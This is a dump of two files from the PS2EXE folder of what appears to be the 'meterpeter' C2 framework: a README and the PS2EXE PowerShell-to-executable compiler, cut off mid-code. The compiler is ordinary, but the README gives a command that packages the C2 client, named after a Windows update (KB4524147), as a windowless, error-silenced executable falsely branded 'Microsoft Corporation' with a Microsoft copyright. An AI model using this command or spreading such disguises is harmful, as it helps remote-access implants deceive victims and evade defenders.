[ { "path": "PS2EXE/README.md", "content": "### ⚙️ PS2EXE BY: Ingo Karstein | MScholtes\r\n\r\n- Description: Script to convert powershell scripts to standalone executables
\r\n- Source :https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5

\r\n\r\n`meterpeter users can use this script (manually) to convert the Client.ps1 to Client.exe`

\r\n\r\n- 1º - Copy **`'Update-KB4524147.ps1'`** build by meterpeter C2 to **`'PS2EXE'`** directory.\r\n- 2º - Open Powershell terminal console in **`'PS2EXE'`** directory (none admin privs required)\r\n- 3º - Execute the follow command to convert the Client.ps1 to standalone executable
\r\n\r\n```\r\n.\\ps2exe.ps1 -inputFile 'Update-KB4524147.ps1' -outputFile 'Update-KB4524147.exe' -iconFile 'meterpeter.ico' -title 'meterpeter binary file' -version '2.10.6' -description 'meterpeter binary file' -product 'meterpeter C2 Client' -company 'Microsoft Corporation' -copyright '©Microsoft Corporation. All Rights Reserved' -noConsole -noVisualStyles -noError\r\n```\r\n\r\n![final](https://user-images.githubusercontent.com/23490060/88741165-d75f2f00-d136-11ea-8761-28b690f0ddf3.png)\r\n\r\n**`REMARK:`** Client.exe (created by PS2EXEC) migth **malfunction** with meterpeter **mimiratz scripts**.\r\n\r\n---\r\n\r\n
\r\n\r\n**Syntax:**\r\n```\r\n ps2exe.ps1 [-inputFile] '' [[-outputFile] ''] [-verbose]\r\n [-debug] [-runtime20|-runtime40] [-lcid ] [-x86|-x64] [-STA|-MTA] [-noConsole]\r\n [-credentialGUI] [-iconFile ''] [-title ''] [-description '<description>']\r\n [-company '<company>'] [-product '<product>'] [-copyright '<copyright>'] [-trademark '<trademark>']\r\n [-version '<version>'] [-configFile] [-noOutput] [-noError] [-noVisualStyles] [-requireAdmin]\r\n [-supportOS] [-virtualize] [-longPaths]\r\n\r\n inputFile = Powershell script that you want to convert to executable\r\n outputFile = destination executable file name, defaults to inputFile with extension '.exe'\r\n runtime20 = this switch forces PS2EXE to create a config file for the generated executable that contains the\r\n \"supported .NET Framework versions\" setting for .NET Framework 2.0/3.x for PowerShell 2.0\r\n runtime40 = this switch forces PS2EXE to create a config file for the generated executable that contains the\r\n \"supported .NET Framework versions\" setting for .NET Framework 4.x for PowerShell 3.0 or higher\r\n x86 or x64 = compile for 32-bit or 64-bit runtime only\r\n lcid = location ID for the compiled executable. Current user culture if not specified\r\n STA or MTA = 'Single Thread Apartment' or 'Multi Thread Apartment' mode\r\n noConsole = the resulting executable will be a Windows Forms app without a console window\r\n credentialGUI = use GUI for prompting credentials in console mode\r\n iconFile = icon file name for the compiled executable\r\n title = title information (displayed in details tab of Windows Explorer's properties dialog)\r\n description = description information (not displayed, but embedded in executable)\r\n company = company information (not displayed, but embedded in executable)\r\n product = product information (displayed in details tab of Windows Explorer's properties dialog)\r\n copyright = copyright information (displayed in details tab of Windows Explorer's properties dialog)\r\n trademark = trademark information (displayed in details tab of Windows Explorer's properties dialog)\r\n version = version information (displayed in details tab of Windows Explorer's properties dialog)\r\n configFile = write config file (<outputfile>.exe.config)\r\n noOutput = the resulting executable will generate no standard output (includes verbose and information channel)\r\n noError = the resulting executable will generate no error output (includes warning and debug channel)\r\nnoVisualStyles = disable visual styles for a generated windows GUI application (only with -noConsole)\r\n requireAdmin = if UAC is enabled, compiled executable run only in elevated context (UAC dialog appears if required)\r\n supportOS = use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)\r\n virtualize = application virtualization is activated (forcing x86 runtime)\r\n longPaths = enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)\r\n\r\n```\r\n" }, { "path": "PS2EXE/ps2exe.ps1", "content": "<#\r\n.SYNOPSIS\r\n Converts powershell scripts to standalone executables.\r\n\r\n.DESCRIPTION\r\n Converts powershell scripts to standalone executables. GUI output and input is activated with one switch,\r\n real windows executables are generated. You may use the graphical front end Win-PS2EXE for convenience.\r\n\r\n Please see Remarks on project page for topics \"GUI mode output formatting\", \"Config files\", \"Password security\",\r\n \"Script variables\" and \"Window in background in -noConsole mode\".\r\n\r\n A generated executables has the following reserved parameters:\r\n -debug Forces the executable to be debugged. It calls \"System.Diagnostics.Debugger.Break()\".\r\n -extract:<FILENAME> Extracts the powerShell script inside the executable and saves it as FILENAME. The script will not be executed.\r\n -wait At the end of the script execution it writes \"Hit any key to exit...\" and waits for a key to be pressed.\r\n -end All following options will be passed to the script inside the executable. All preceding options are used by the executable itself.\r\n\r\n.PARAMETER inputFile\r\n Powershell script to convert to executable\r\n \r\n.PARAMETER outputFile\r\n destination executable file name, defaults to inputFile with extension '.exe'\r\n \r\n.PARAMETER runtime20\r\n this switch forces PS2EXE to create a config file for the generated executable that contains the \"supported .NET Framework versions\" setting for .NET Framework 2.0/3.x for PowerShell 2.0\r\n\r\n.PARAMETER runtime40\r\n this switch forces PS2EXE to create a config file for the generated executable that contains the \"supported .NET Framework versions\" setting for .NET Framework 4.x for PowerShell 3.0 or higher\r\n\r\n.PARAMETER x86\r\n compile for 32-bit runtime only\r\n\r\n.PARAMETER x64\r\n compile for 64-bit runtime only\r\n \r\n.PARAMETER lcid\r\n location ID for the compiled executable. Current user culture if not specified\r\n \r\n.PARAMETER STA\r\n Single Thread Apartment mode\r\n \r\n.PARAMETER MTA\r\n Multi Thread Apartment mode\r\n \r\n.PARAMETER nested\r\n internal use\r\n\r\n.PARAMETER noConsole\r\n the resulting executable will be a Windows Forms app without a console window. You might want to pipe your output to Out-String to prevent a message box for every line of output (example: dir C:\\ | Out-String)\r\n\r\n.PARAMETER credentialGUI\r\n use GUI for prompting credentials in console mode instead of console input\r\n\r\n.PARAMETER iconFile\r\n icon file name for the compiled executable\r\n\r\n.PARAMETER title\r\n title information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER description\r\n description information (not displayed, but embedded in executable)\r\n\r\n.PARAMETER company\r\n company information (not displayed, but embedded in executable)\r\n\r\n.PARAMETER product\r\n product information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER copyright\r\n copyright information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER trademark\r\n trademark information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER version\r\n version information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER configFile\r\n write a config file (<outputfile>.exe.config)\r\n\r\n.PARAMETER noConfigFile\r\n compatibility parameter\r\n\r\n.PARAMETER noOutput\r\n the resulting executable will generate no standard output (includes verbose and information channel)\r\n\r\n.PARAMETER noError\r\n the resulting executable will generate no error output (includes warning and debug channel)\r\n\r\n.PARAMETER noVisualStyles\r\n disable visual styles for a generated windows GUI application. Only applicable with parameter -noConsole\r\n\r\n.PARAMETER requireAdmin\r\n if UAC is enabled, compiled executable will run only in elevated context (UAC dialog appears if required)\r\n\r\n.PARAMETER supportOS\r\n use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)\r\n\r\n.PARAMETER virtualize\r\n application virtualization is activated (forcing x86 runtime)\r\n\r\n.PARAMETER longPaths\r\n enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)\r\n\r\n.EXAMPLE\r\n ps2exe.ps1 C:\\Data\\MyScript.ps1\r\n Compiles C:\\Data\\MyScript.ps1 to C:\\Data\\MyScript.exe as console executable\r\n\r\n.EXAMPLE\r\n ps2exe.ps1 -inputFile C:\\Data\\MyScript.ps1 -outputFile C:\\Data\\MyScriptGUI.exe -iconFile C:\\Data\\Icon.ico -noConsole -title \"MyScript\" -version 0.0.0.1\r\n Compiles C:\\Data\\MyScript.ps1 to C:\\Data\\MyScriptGUI.exe as graphical executable, icon and meta data\r\n\r\n.NOTES\r\n Version: 0.5.0.21\r\n Date: 2020-07-10\r\n Author: Ingo Karstein, Markus Scholtes\r\n\r\n.LINK\r\n https://gallery.technet.microsoft.com/PS2EXE-GUI-Convert-e7cb69d5\r\n#>\r\n\r\nParam([STRING]$inputFile = $NULL, [STRING]$outputFile = $NULL, [SWITCH]$verbose, [SWITCH]$debug, [SWITCH]$runtime20, [SWITCH]$runtime40,\r\n\t[SWITCH]$x86, [SWITCH]$x64, [int]$lcid, [SWITCH]$STA, [SWITCH]$MTA, [SWITCH]$nested, [SWITCH]$noConsole, [SWITCH]$credentialGUI,\r\n\t[STRING]$iconFile = $NULL, [STRING]$title, [STRING]$description, [STRING]$company, [STRING]$product, [STRING]$copyright, [STRING]$trademark,\r\n\t[STRING]$version, [SWITCH]$configFile, [SWITCH]$noConfigFile, [SWITCH]$noOutput, [SWITCH]$noError, [SWITCH]$noVisualStyles, [SWITCH]$requireAdmin,\r\n\t[SWITCH]$supportOS, [SWITCH]$virtualize, [SWITCH]$longPaths)\r\n\r\n<################################################################################>\r\n<## ##>\r\n<## PS2EXE-GUI v0.5.0.21 ##>\r\n<## Written by: Ingo Karstein (http://blog.karstein-consulting.com) ##>\r\n<## Reworked and GUI support by Markus Scholtes ##>\r\n<## ##>\r\n<## This script is released under Microsoft Public Licence ##>\r\n<## that can be downloaded here: ##>\r\n<## http://www.microsoft.com/opensource/licenses.mspx#Ms-PL ##>\r\n<## ##>\r\n<################################################################################>\r\n\r\nif (!$nested)\r\n{\r\n\tWrite-Output \" PS2EXE - v0.5.0.21 by Ingo Karstein, reworked and GUI support by Markus Scholtes\"\r\n}\r\nelse\r\n{\r\n\tWrite-Output \"PowerShell 2.0 environment started...\"\r\n}\r\n\r\nif ([STRING]::IsNullOrEmpty($inputFile))\r\n{\r\n\tWrite-Output \"Usage:`n\"\r\n\tWrite-Output \"powershell.exe -command \"\"&'.\\ps2exe.ps1' [-inputFile] '<filename>' [[-outputFile] '<filename>'] [-verbose]\"\r\n\tWrite-Output \" [-debug] [-runtime20|-runtime40] [-x86|-x64] [-lcid <id>] [-STA|-MTA] [-noConsole]\"\r\n\tWrite-Output \" [-credentialGUI] [-iconFile '<filename>'] [-title '<title>'] [-description '<description>']\"\r\n\tWrite-Output \" [-company '<company>'] [-product '<product>'] [-copyright '<copyright>'] [-trademark '<trademark>']\"\r\n\tWrite-Output \" [-version '<version>'] [-configFile] [-noOutput] [-noError] [-noVisualStyles] [-requireAdmin]\"\r\n\tWrite-Output \" [-supportOS] [-virtualize] [-longPaths]\"\"`n\"\r\n\tWrite-Output \" inputFile = Powershell script that you want to convert to executable\"\r\n\tWrite-Output \" outputFile = destination executable file name, defaults to inputFile with extension '.exe'\"\r\n\tWrite-Output \" runtime20 = this switch forces PS2EXE to create a config file for the generated executable that contains the\"\r\n\tWrite-Output \" \"\"supported .NET Framework versions\"\" setting for .NET Framework 2.0/3.x for PowerShell 2.0\"\r\n\tWrite-Output \" runtime40 = this switch forces PS2EXE to create a config file for the generated executable that contains the\"\r\n\tWrite-Output \" \"\"supported .NET Framework versions\"\" setting for .NET Framework 4.x for PowerShell 3.0 or higher\"\r\n\tWrite-Output \" x86 or x64 = compile for 32-bit or 64-bit runtime only\"\r\n\tWrite-Output \" lcid = location ID for the compiled executable. Current user culture if not specified\"\r\n\tWrite-Output \" STA or MTA = 'Single Thread Apartment' or 'Multi Thread Apartment' mode\"\r\n\tWrite-Output \" noConsole = the resulting executable will be a Windows Forms app without a console window\"\r\n\tWrite-Output \" credentialGUI = use GUI for prompting credentials in console mode\"\r\n\tWrite-Output \" iconFile = icon file name for the compiled executable\"\r\n\tWrite-Output \" title = title information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \" description = description information (not displayed, but embedded in executable)\"\r\n\tWrite-Output \" company = company information (not displayed, but embedded in executable)\"\r\n\tWrite-Output \" product = product information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \" copyright = copyright information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \" trademark = trademark information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \" version = version information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \" configFile = write a config file (<outputfile>.exe.config)\"\r\n\tWrite-Output \" noOutput = the resulting executable will generate no standard output (includes verbose and information channel)\"\r\n\tWrite-Output \" noError = the resulting executable will generate no error output (includes warning and debug channel)\"\r\n\tWrite-Output \"noVisualStyles = disable visual styles for a generated windows GUI application (only with -noConsole)\"\r\n\tWrite-Output \" requireAdmin = if UAC is enabled, compiled executable run only in elevated context (UAC dialog appears if required)\"\r\n\tWrite-Output \" supportOS = use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)\"\r\n\tWrite-Output \" virtualize = application virtualization is activated (forcing x86 runtime)\"\r\n\tWrite-Output \" longPaths = enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)`n\"\r\n\tWrite-Output \"Input file not specified!\"\r\n\texit -1\r\n}\r\n\r\n$psversion = 0\r\nif ($PSVersionTable.PSVersion.Major -ge 4)\r\n{\r\n\t$psversion = 4\r\n\t#Write-Output \"You are using PowerShell 4.0 or above.\"\r\n}\r\n\r\nif ($PSVersionTable.PSVersion.Major -eq 3)\r\n{\r\n\t$psversion = 3\r\n\tWrite-Output \"You are using PowerShell 3.0.\"\r\n}\r\n\r\nif ($PSVersionTable.PSVersion.Major -eq 2)\r\n{\r\n\t$psversion = 2\r\n\tWrite-Output \"You are using PowerShell 2.0.\"\r\n}\r\n\r\nif ($psversion -eq 0)\r\n{\r\n\tWrite-Error \"The powershell version is unknown!\"\r\n\texit -1\r\n}\r\n\r\n# retrieve absolute paths independent if path is given relative oder absolute\r\n$inputFile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($inputFile)\r\nif ([STRING]::IsNullOrEmpty($outputFile))\r\n{\r\n\t$outputFile = ([System.IO.Path]::Combine([System.IO.Path]::GetDirectoryName($inputFile), [System.IO.Path]::GetFileNameWithoutExtension($inputFile)+\".exe\"))\r\n}\r\nelse\r\n{\r\n\t$outputFile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($outputFile)\r\n}\r\n\r\nif (!(Test-Path $inputFile -PathType Leaf))\r\n{\r\n\tWrite-Error \" Input file => $($inputfile) not found!\"\r\n\texit -1\r\n}\r\n\r\nif ($inputFile -eq $outputFile)\r\n{\r\n\tWrite-Error \" Input file is identical to output file!\"\r\n\texit -1\r\n}\r\n\r\nif (($outputFile -notlike \"*.exe\") -and ($outputFile -notlike \"*.com\"))\r\n{\r\n\tWrite-Error \"Output file must have extension '.exe' or '.com'!\"\r\n\texit -1\r\n}\r\n\r\nif (!([STRING]::IsNullOrEmpty($iconFile)))\r\n{\r\n\t# retrieve absolute path independent if path is given relative oder absolute\r\n\t$iconFile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($iconFile)\r\n\r\n\tif (!(Test-Path $iconFile -PathType Leaf))\r\n\t{\r\n\t\tWrite-Error \"Icon file $($iconFile) not found!\"\r\n\t\texit -1\r\n\t}\r\n}\r\n\r\nif ($requireAdmin -and $virtualize)\r\n{\r\n\tWrite-Error \"-requireAdmin cannot be combined with -virtualize\"\r\n\texit -1\r\n}\r\nif ($supportOS -and $virtualize)\r\n{\r\n\tWrite-Error \"-supportOS cannot be combined with -virtualize\"\r\n\texit -1\r\n}\r\nif ($longPaths -and $virtualize)\r\n{\r\n\tWrite-Error \"-longPaths cannot be combined with -virtualize\"\r\n\texit -1\r\n}\r\n\r\nif ($runtime20 -and $runtime40)\r\n{\r\n\tWrite-Error \"You cannot use switches -runtime20 and -runtime40 at the same time!\"\r\n\texit -1\r\n}\r\n\r\nif (!$runtime20 -and !$runtime40)\r\n{\r\n\tif ($psversion -eq 4)\r\n\t{\r\n\t\t$runtime40 = $TRUE\r\n\t}\r\n\telseif ($psversion -eq 3)\r\n\t{\r\n\t\t$runtime40 = $TRUE\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$runtime20 = $TRUE\r\n\t}\r\n}\r\n\r\nif ($runtime20 -and $longPaths)\r\n{\r\n\tWrite-Error \"Long paths are only available with .Net 4\"\r\n\texit -1\r\n}\r\n\r\n$CFGFILE = $FALSE\r\nif ($configFile)\r\n{ $CFGFILE = $TRUE\r\n\tif ($noConfigFile)\r\n\t{\r\n\t\tWrite-Error \"-configFile cannot be combined with -noConfigFile\"\r\n\t\texit -1\r\n\t}\r\n}\r\nif (!$CFGFILE -and $longPaths)\r\n{\r\n\tWrite-Warning \"Forcing generation of a config file, since the option -longPaths requires this\"\r\n\t$CFGFILE = $TRUE\r\n}\r\n\r\nif ($STA -and $MTA)\r\n{\r\n\tWrite-Error \"You cannot use switches -STA and -MTA at the same time!\"\r\n\texit -1\r\n}\r\n\r\nif ($psversion -ge 3 -and $runtime20)\r\n{\r\n\tWrite-Output \"To create an EXE file for PowerShell 2.0 on PowerShell 3.0 or above this script now launches PowerShell 2.0...`n\"\r\n\r\n\t$arguments = \"-inputFile '$($inputFile)' -outputFile '$($outputFile)' -nested \"\r\n\r\n\tif ($verbose) { $arguments += \"-verbose \"}\r\n\tif ($debug) { $arguments += \"-debug \"}\r\n\tif ($runtime20) { $arguments += \"-runtime20 \"}\r\n\tif ($x86) { $arguments += \"-x86 \"}\r\n\tif ($x64) { $arguments += \"-x64 \"}\r\n\tif ($lcid) { $arguments += \"-lcid $lcid \"}\r\n\tif ($STA) { $arguments += \"-STA \"}\r\n\tif ($MTA) { $arguments += \"-MTA \"}\r\n\tif ($noConsole) { $arguments += \"-noConsole \"}\r\n\tif (!([STRING]::IsNullOrEmpty($iconFile))) { $arguments += \"-iconFile '$($iconFile)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($title))) { $arguments += \"-title '$($title)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($description))) { $arguments += \"-description '$($description)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($company))) { $arguments += \"-company '$($company)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($product))) { $arguments += \"-product '$($product)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($copyright))) { $arguments += \"-copyright '$($copyright)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($trademark))) { $arguments += \"-trademark '$($trademark)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($version))) { $arguments += \"-version '$($version)' \"}\r\n\tif ($noOutput) { $arguments += \"-noOutput \"}\r\n\tif ($noError) { $arguments += \"-noError \"}\r\n\tif ($requireAdmin) { $arguments += \"-requireAdmin \"}\r\n\tif ($virtualize) { $arguments += \"-virtualize \"}\r\n\tif ($credentialGUI) { $arguments += \"-credentialGUI \"}\r\n\tif ($supportOS) { $arguments += \"-supportOS \"}\r\n\tif ($configFile) { $arguments += \"-configFile \"}\r\n\tif ($noConfigFile) { $arguments += \"-noConfigFile \"}\r\n\r\n\tif ($MyInvocation.MyCommand.CommandType -eq \"ExternalScript\")\r\n\t{\t# ps2exe.ps1 is running (script)\r\n\t\t$jobScript = @\"\r\n.\"$($PSHOME)\\powershell.exe\" -version 2.0 -command \"&'$($MyInvocation.MyCommand.Path)' $($arguments)\"\r\n\"@\r\n\t}\r\n\telse\r\n\t{ # ps2exe.exe is running (compiled script)\r\n\t\tWrite-Warning \"The parameter -runtime20 is not supported for compiled ps2exe.ps1 scripts.\"\r\n\t\tWrite-Warning \"Compile ps2exe.ps1 with parameter -runtime20 and call the generated executable (without -runtime20).\"\r\n\t\texit -1\r\n\t}\r\n\r\n\tInvoke-Expression $jobScript\r\n\r\n\texit 0\r\n}\r\n\r\nif ($psversion -lt 3 -and $runtime40)\r\n{\r\n\tWrite-Error \"You need to run ps2exe in an Powershell 3.0 or higher environment to use parameter -runtime40\"\r\n\texit -1\r\n}\r\n\r\nif ($psversion -lt 3 -and !$MTA -and !$STA)\r\n{\r\n\t# Set default apartment mode for powershell version if not set by parameter\r\n\t$MTA = $TRUE\r\n}\r\n\r\nif ($psversion -ge 3 -and !$MTA -and !$STA)\r\n{\r\n\t# Set default apartment mode for powershell version if not set by parameter\r\n\t$STA = $TRUE\r\n}\r\n\r\n# escape escape sequences in version info\r\n$title = $title -replace \"\\\\\", \"\\\\\"\r\n$product = $product -replace \"\\\\\", \"\\\\\"\r\n$copyright = $copyright -replace \"\\\\\", \"\\\\\"\r\n$trademark = $trademark -replace \"\\\\\", \"\\\\\"\r\n$description = $description -replace \"\\\\\", \"\\\\\"\r\n$company = $company -replace \"\\\\\", \"\\\\\"\r\n\r\nif (![STRING]::IsNullOrEmpty($version))\r\n{ # check for correct version number information\r\n\tif ($version -notmatch \"(^\\d+\\.\\d+\\.\\d+\\.\\d+$)|(^\\d+\\.\\d+\\.\\d+$)|(^\\d+\\.\\d+$)|(^\\d+$)\")\r\n\t{\r\n\t\tWrite-Error \"Version number has to be supplied in the form n.n.n.n, n.n.n, n.n or n (with n as number)!\"\r\n\t\texit -1\r\n\t}\r\n}\r\n\r\nWrite-Output \"\"\r\n\r\n$type = ('System.Collections.Generic.Dictionary`2') -as \"Type\"\r\n$type = $type.MakeGenericType( @( (\"System.String\" -as \"Type\"), (\"system.string\" -as \"Type\") ) )\r\n$o = [Activator]::CreateInstance($type)\r\n\r\n$compiler20 = $FALSE\r\nif ($psversion -eq 3 -or $psversion -eq 4)\r\n{\r\n\t$o.Add(\"CompilerVersion\", \"v4.0\")\r\n}\r\nelse\r\n{\r\n\tif (Test-Path (\"$ENV:WINDIR\\Microsoft.NET\\Framework\\v3.5\\csc.exe\"))\r\n\t{ $o.Add(\"CompilerVersion\", \"v3.5\") }\r\n\telse\r\n\t{\r\n\t\tWrite-Warning \"No .Net 3.5 compiler found, using .Net 2.0 compiler.\"\r\n\t\tWrite-Warning \"Therefore some methods are not available!\"\r\n\t\t$compiler20 = $TRUE\r\n\t\t$o.Add(\"CompilerVersion\", \"v2.0\")\r\n\t}\r\n}\r\n\r\n$referenceAssembies = @(\"System.dll\")\r\nif (!$noConsole)\r\n{\r\n\tif ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"Microsoft.PowerShell.ConsoleHost.dll\" })\r\n\t{\r\n\t\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"Microsoft.PowerShell.ConsoleHost.dll\" } | Select-Object -First 1).Location\r\n\t}\r\n}\r\n$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Management.Automation.dll\" } | Select-Object -First 1).Location\r\n\r\nif ($runtime40)\r\n{\r\n\t$n = New-Object System.Reflection.AssemblyName(\"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\")\r\n\t[System.AppDomain]::CurrentDomain.Load($n) | Out-Null\r\n\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Core.dll\" } | Select-Object -First 1).Location\r\n}\r\n\r\nif ($noConsole)\r\n{\r\n\t$n = New-Object System.Reflection.AssemblyName(\"System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\")\r\n\tif ($runtime40)\r\n\t{\r\n\t\t$n = New-Object System.Reflection.AssemblyName(\"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\")\r\n\t}\r\n\t[System.AppDomain]::CurrentDomain.Load($n) | Out-Null\r\n\r\n\t$n = New-Object System.Reflection.AssemblyName(\"System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\")\r\n\tif ($runtime40)\r\n\t{\r\n\t\t$n = New-Object System.Reflection.AssemblyName(\"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\")\r\n\t}\r\n\t[System.AppDomain]::CurrentDomain.Load($n) | Out-Null\r\n\r\n\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Windows.Forms.dll\" } | Select-Object -First 1).Location\r\n\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Drawing.dll\" } | Select-Object -First 1).Location\r\n}\r\n\r\n$platform = \"anycpu\"\r\nif ($x64 -and !$x86) { $platform = \"x64\" } else { if ($x86 -and !$x64) { $platform = \"x86\" }}\r\n\r\n$cop = (New-Object Microsoft.CSharp.CSharpCodeProvider($o))\r\n$cp = New-Object System.CodeDom.Compiler.CompilerParameters($referenceAssembies, $outputFile)\r\n$cp.GenerateInMemory = $FALSE\r\n$cp.GenerateExecutable = $TRUE\r\n\r\n$iconFileParam = \"\"\r\nif (!([STRING]::IsNullOrEmpty($iconFile)))\r\n{\r\n\t$iconFileParam = \"`\"/win32icon:$($iconFile)`\"\"\r\n}\r\n\r\n$manifestParam = \"\"\r\nif ($requireAdmin -or $supportOS -or $longPaths)\r\n{\r\n\t$manifestParam = \"`\"/win32manifest:$($outputFile+\".win32manifest\")`\"\"\r\n\t$win32manifest = \"<?xml version=\"\"1.0\"\" encoding=\"\"UTF-8\"\" standalone=\"\"yes\"\"?>`r`n<assembly xmlns=\"\"urn:schemas-microsoft-com:asm.v1\"\" manifestVersion=\"\"1.0\"\">`r`n\"\r\n\tif ($longPaths)\r\n\t{\r\n\t\t$win32manifest += \"<application xmlns=\"\"urn:schemas-microsoft-com:asm.v3\"\">`r`n<windowsSettings>`r`n<longPathAware xmlns=\"\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\"\">true</longPathAware>`r`n</windowsSettings>`r`n</application>`r`n\"\r\n\t}\r\n\tif ($requireAdmin)\r\n\t{\r\n\t\t$win32manifest += \"<trustInfo xmlns=\"\"urn:schemas-microsoft-com:asm.v2\"\">`r`n<security>`r`n<requestedPrivileges xmlns=\"\"urn:schemas-microsoft-com:asm.v3\"\">`r`n<requestedExecutionLevel level=\"\"requireAdministrator\"\" uiAccess=\"\"false\"\"/>`r`n</requestedPrivileges>`r`n</security>`r`n</trustInfo>`r`n\"\r\n\t}\r\n\tif ($supportOS)\r\n\t{\r\n\t\t$win32manifest += \"<compatibility xmlns=\"\"urn:schemas-microsoft-com:compatibility.v1\"\">`r`n<application>`r`n<supportedOS Id=\"\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"\"/>`r`n<supportedOS Id=\"\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"\"/>`r`n<supportedOS Id=\"\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"\"/>`r`n<supportedOS Id=\"\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"\"/>`r`n<supportedOS Id=\"\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"\"/>`r`n</application>`r`n</compatibility>`r`n\"\r\n\t}\r\n\t$win32manifest += \"</assembly>\"\r\n\t$win32manifest | Set-Content ($outputFile+\".win32manifest\") -Encoding UTF8\r\n}\r\n\r\nif (!$virtualize)\r\n{ $cp.CompilerOptions = \"/platform:$($platform) /target:$( if ($noConsole){'winexe'}else{'exe'}) $($iconFileParam) $($manifestParam)\" }\r\nelse\r\n{\r\n\tWrite-Output \"Application virtualization is activated, forcing x86 platfom.\"\r\n\t$cp.CompilerOptions = \"/platform:x86 /target:$( if ($noConsole) { 'winexe' } else { 'exe' } ) /nowin32manifest $($iconFileParam)\"\r\n}\r\n\r\n$cp.IncludeDebugInformation = $debug\r\n\r\nif ($debug)\r\n{\r\n\t$cp.TempFiles.KeepFiles = $TRUE\r\n}\r\n\r\nIf($inputFile -match 'meterpeter'){$parsingPath = $inputFile -replace '\\\\PS2EXE',''}else{$parsingPath = $inputFile}\r\nWrite-Output \" Input file => $parsingPath\"\r\n$content = Get-Content -LiteralPath $inputFile -Encoding UTF8 -ErrorAction SilentlyContinue\r\nif ([STRING]::IsNullOrEmpty($content))\r\n{\r\n\tWrite-Error \"No data found. May be read error or file protected.\"\r\n\texit -2\r\n}\r\n$scriptInp = [STRING]::Join(\"`r`n\", $content)\r\n$script = [System.Convert]::ToBase64String(([System.Text.Encoding]::UTF8.GetBytes($scriptInp)))\r\n\r\n$culture = \"\"\r\n\r\nif ($lcid)\r\n{\r\n\t$culture = @\"\r\n\tSystem.Threading.Thread.CurrentThread.CurrentCulture = System.Globalization.CultureInfo.GetCultureInfo($lcid);\r\n\tSystem.Threading.Thread.CurrentThread.CurrentUICulture = System.Globalization.CultureInfo.GetCultureInfo($lcid);\r\n\"@\r\n}\r\n\r\n$programFrame = @\"\r\n// Simple PowerShell host created by Ingo Karstein (http://blog.karstein-consulting.com) for PS2EXE\r\n// Reworked and GUI support by Markus Scholtes\r\n\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Text;\r\nusing System.Management.Automation;\r\nusing System.Management.Automation.Runspaces;\r\nusing PowerShell = System.Management.Automation.PowerShell;\r\nusing System.Globalization;\r\nusing System.Management.Automation.Host;\r\nusing System.Security;\r\nusing System.Reflection;\r\nusing System.Runtime.InteropServices;\r\n$(if ($noConsole) {@\"\r\nusing System.Windows.Forms;\r\nusing System.Drawing;\r\n\"@ })\r\n\r\n[assembly:AssemblyTitle(\"$title\")]\r\n[assembly:AssemblyProduct(\"$product\")]\r\n[assembly:AssemblyCopyright(\"$copyright\")]\r\n[assembly:AssemblyTrademark(\"$trademark\")]\r\n$(if (![STRING]::IsNullOrEmpty($version)) {@\"\r\n[assembly:AssemblyVersion(\"$version\")]\r\n[assembly:AssemblyFileVersion(\"$version\")]\r\n\"@ })\r\n// not displayed in details tab of properties dialog, but embedded to file\r\n[assembly:AssemblyDescription(\"$description\")]\r\n[assembly:AssemblyCompany(\"$company\")]\r\n\r\nnamespace ik.PowerShell\r\n{\r\n$(if ($noConsole -or $credentialGUI) {@\"\r\n\tinternal class 